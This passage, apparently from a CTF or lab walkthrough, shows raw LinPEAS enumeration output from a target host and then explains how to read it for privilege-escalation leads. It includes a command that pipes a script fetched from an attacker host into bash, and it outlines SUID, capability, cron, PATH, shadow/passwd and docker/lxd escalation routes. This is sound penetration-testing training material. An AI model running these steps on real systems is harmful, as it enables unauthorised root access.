Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001                                                                                     
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/www/html/static/images/icon/Thumbs.db: Composite Document File V2 Document, Cannot read section info
Found /var/www/html/static/images/icon/market-value/Thumbs.db: Composite Document File V2 Document, Cannot read section info

 -> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
 -> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)                                                                                                                  
 -> Extracting tables from /var/lib/fwupd/pending.db (limit 20)                                                                                                                               
                                                                                                                                                                                              
╔══════════╣ Web files?(output limit)
/var/www/:                                                                                                                                                                                    
total 12K
drwxr-xr-x  3 root   root   4.0K May 23  2021 .
drwxr-xr-x 14 root   root   4.0K May 23  2021 ..
drwxr-xr-x  6 nathan nathan 4.0K May 25  2021 html

/var/www/html:
total 32K
drwxr-xr-x 6 nathan nathan 4.0K May 25  2021 .
drwxr-xr-x 3 root   root   4.0K May 23  2021 ..

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 nathan nathan 220 Feb 25  2020 /home/nathan/.bash_logout                                                                                                                         
-rw-r--r-- 1 landscape landscape 0 Jul 31  2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 220 Feb 25  2020 /etc/skel/.bash_logout
-rw------- 1 root root 0 Jul 31  2020 /etc/.pwd.lock
-rw------- 1 root root 0 Nov  7 03:23 /run/snapd/lock/.lock
-rw-r--r-- 1 root root 0 Nov  7 03:23 /run/network/.ifstate.lock
-rw------- 1 root root 0 May  7  2021 /snap/core18/2066/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr  4  2018 /snap/core18/2066/etc/skel/.bash_logout
-rw------- 1 root root 0 Jun 11  2021 /snap/core18/2074/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr  4  2018 /snap/core18/2074/etc/skel/.bash_logout

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 2564 May 23  2021 /var/backups/alternatives.tar.1.gz                                                                                                                   
-rw-r--r-- 1 root root 51200 Nov  7 06:25 /var/backups/alternatives.tar.0

╔══════════╣ Searching passwords in history files
                                                                                                                                                                                              
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password                                                                                                                                                                    
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
  #)There are more creds/passwds files in the previous parent folder

/usr/share/doc/git/contrib/credential

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                                                                              
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
                                                                                                                                                                                              
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal matches                                                                                                       
[   35.196999] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[   36.188414] systemd[1]: Started Forward Password Requests to Wall Directory Watch.



                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════                                                                                                            
                                ╚════════════════╝                                                                                                                                            
Regexes to search for API keys aren't activated, use param '-r'

The LinPEAS output is extremely detailed and usually contains several candidate privilege-escalation paths. To work through it efficiently, start with the key sections and the highlighted content: LinPEAS uses colour and section banners precisely so that potential escalation leads can be found quickly. The steps below describe how to parse the output and which parts deserve attention.


1. Save the LinPEAS output to a file so it can be searched by keyword

If reading the output directly in the terminal is inconvenient, redirect it to a file so it can be filtered later with grep and similar commands (the command runs on the target; 10.10.14.24 is the attacker host serving linpeas.sh):

curl http://10.10.14.24/linpeas.sh | bash > linpeas_output.txt

Once saved, the file can be viewed and filtered with a text editor (such as vim) or command-line tools (such as less and grep). Two caveats: the redirect captures only standard output, and LinPEAS's ANSI colour escapes are written into the file along with the text. Open it with less -R so the highlights render, and strip the escape sequences before grepping, otherwise a pattern that spans a highlighted token may fail to match.


2. Interpreting the colours and sections of the LinPEAS output

LinPEAS presents its findings using colour and section banners. Broadly, the colours mean:

  • Red highlight: a likely serious weakness or a direct privilege-escalation opportunity; look at these first.
  • Yellow highlight: a potential weakness or unusual configuration that needs further verification.
  • Green highlight: system configuration information such as network, kernel and service details, useful for understanding the target environment.

LinPEAS prints its own legend at the start of each run; text shown in yellow on a red background is what it rates as almost certainly a privilege-escalation vector, and that legend takes precedence over the summary above.

3. Key checks and common keywords

Work through the following checks in order to narrow down an escalation path quickly:

1. SUID / SGID files
  • The SUID (Set User ID) and SGID (Set Group ID) bits make a program run with the privileges of the file's owner or group, which can be a privilege-escalation opportunity.
  • Filter the SUID findings with grep:
    grep -i "SUID" linpeas_output.txt

    Focus on: whether binaries such as /bin/bash, vim, nmap or find carry the SUID bit; programs like these can be abused to escalate privileges (GTFOBins documents the exact invocations). Compare the list against the distribution's default SUID set, since entries such as passwd, sudo and mount are expected.

2. Capabilities
  • Capabilities are Linux's fine-grained privilege mechanism, for example cap_setuid or cap_net_bind_service.
  • Show the files that carry capabilities:
    grep -i "capabilities" linpeas_output.txt

    Focus on: interpreters or executables such as Python or Perl that carry cap_setuid. An interpreter with that capability can call setuid(0) and then spawn a root shell. cap_dac_override, cap_dac_read_search and cap_sys_admin deserve the same attention.

3. Cron jobs and scheduled tasks
  • Misconfigured cron jobs and scheduled tasks can let a low-privileged user edit or run a script that executes with root privileges.
  • Find the cron-related content:
    grep -i "cron" linpeas_output.txt

    Focus on: a task that runs as root (in /etc/cron.d/*, /etc/crontab, or a script those entries invoke) whose script is writable by a low-privileged user; editing the script then yields code execution as root. Check the script's directory as well, and whether the job runs a command by bare name that a writable PATH entry could hijack.

4. PATH configuration and environment variables
  • LinPEAS checks the PATH variable for writable directories. If PATH contains a directory writable by a low-privileged user, a malicious program placed there can hijack system commands.
  • Find the PATH information:
    grep -i "path" linpeas_output.txt

    Focus on: a PATH entry writable by the current user, which can be used to plant a malicious command. This keyword is noisy (it also matches ordinary file paths); LinPEAS's own PATH section is the relevant hit, and a writable entry only matters if something privileged (a cron job, a SUID binary, a sudo rule) executes a command by bare name.

5. Kernel and service versions
  • LinPEAS reports the kernel version and the versions of running services, which help determine whether known vulnerabilities apply.
  • Find the kernel version:
    grep -i "kernel" linpeas_output.txt
  • Focus on: if the kernel or a specific service version has a known vulnerability, the corresponding exploit can be tried (for example the Dirty COW or OverlayFS kernel bugs). Verify the exact version and distribution patch level first; distributions backport fixes without changing the version string, and a failed kernel exploit can crash the target.

6. Permissions of sensitive files
  • LinPEAS checks the permissions of critical files such as /etc/shadow, /etc/passwd and the contents of .ssh directories.
  • Check whether any critical file has bad permissions:
    grep -i "shadow" linpeas_output.txt

    Focus on: if /etc/shadow is readable by the current user, the password hashes can be taken for offline cracking; if /etc/passwd is writable, a new user with a known password hash (or UID 0) can be added directly.

7. User and group membership
  • LinPEAS lists the system's users and groups, which shows whether the current user belongs to a privileged group.
  • Search for group information with grep:
    grep -i "group" linpeas_output.txt

    Focus on: whether the current user belongs to a privileged group such as docker or lxd; these groups can be abused to obtain higher privileges, for instance by starting a container that mounts the host filesystem.

Privilege escalation

Same as above: the route to root is the capabilities finding described in the checklist.
